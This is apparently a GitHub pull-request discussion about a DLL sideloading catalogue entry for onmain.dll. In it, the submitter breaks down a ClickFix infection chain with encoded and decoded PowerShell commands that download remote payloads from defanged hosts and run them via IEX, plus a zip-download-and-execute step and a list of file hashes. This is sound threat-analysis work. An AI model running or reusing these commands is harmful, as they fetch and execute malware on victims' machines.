Conversation
wietze
left a comment
wietze
left a comment
There was a problem hiding this comment.
Hey @polygonben, thanks for your first submission! Just one question from me, see below.
| SHA256: | ||
| - '97597a20a5f03bc1dc0d4a4b75d0026dfad79291e33ea72103abf85d0e2c6f19' | ||
| Resources: | ||
| - https://www.virustotal.com/gui/file/73670defa750d0a09470356279494a0c947245229d283c42e7ef0f2b8427b847 |
There was a problem hiding this comment.
What's the relevance of this hash in relation to onmain.dll?
There was a problem hiding this comment.
This wasn't relevant. This was the binary that loaded onmain.dll
There was a problem hiding this comment.
VirusTotal is showing it as a malicious mfc100u.dll rather than a trusted executable, I'm still confused as to what the relation is
There was a problem hiding this comment.
Hi,
I'm not too sure why I included it - it doesn't appear related at all. Here is the breakdown of the execution chain that led to the DLL hijacking:
Stage 1 (ClickFix):
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" /ep bypass /enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABzAGUAZQAuAGkAbwAvADcAagBwAGYAYwB1ACcAKQB8AEkARQBYAA== /W 1
(new-object Net.WebClient).DownloadString('hxxps://psee[.]io/7jpfcu')|IEX
Stage 2 (Further Pwsh):
We can see this URL redirects to secondary domain to pull back the 2nd stage PowerShell payload:
hxxps://psee[.]io/7jpfcu -> redirects to -> cromatsfewbears.top/barbara/bens:
Invoke-WebRequest -Uri "hxxps://bitly[.]cx/XaqK" -OutFile "$env:TEMP\collectionreserch.zip"; Expand-Archive -Path "$env:TEMP\collectionreserch.zip" -DestinationPath "$env:TEMP"; & "$env:TEMP\s1clubcollection\C-Alp16.exe"
Stage 3 (Renamed OneNote.exe ran)
We can see the URL redirects to:
hxxps://bitly[.]cx/XaqK -> redirects to -> hxxps://septembergoodwine[.]top/fatality/frenderic downloading below .zip
collectionreserch.zip
MD5 (C-Alp16.exe) = 474ca98328d98ac1f8b4a0aa88b5dcf8 - Legitimate OneNote.exe
MD5 (Crookmutmoung.pgvk) = d41cd0f49d17aa1b9dc0a30fd78fd25a
MD5 (ONMAIN.DLL) = 702e8eb832e3831cadf42b4d725af23f -> Likely sideloaded!
MD5 (Pratshib.vi) = 448c6c7adeb8423f653f46d2f8e8230d
MD5 (msvcp90.dll) = 6d4e6fdb62660d81a6d7cd0144fa8fa4 - Legitimate
MD5 (msvcr90.dll) = ecbbed2f44afb22ba1f9ef8603c261b5 - Legitimate
|
Apologies for the above. I was trying to submit a new entry 'cscomp.yml' but I must be doing something seriously wrong. |
2 participants
No description provided.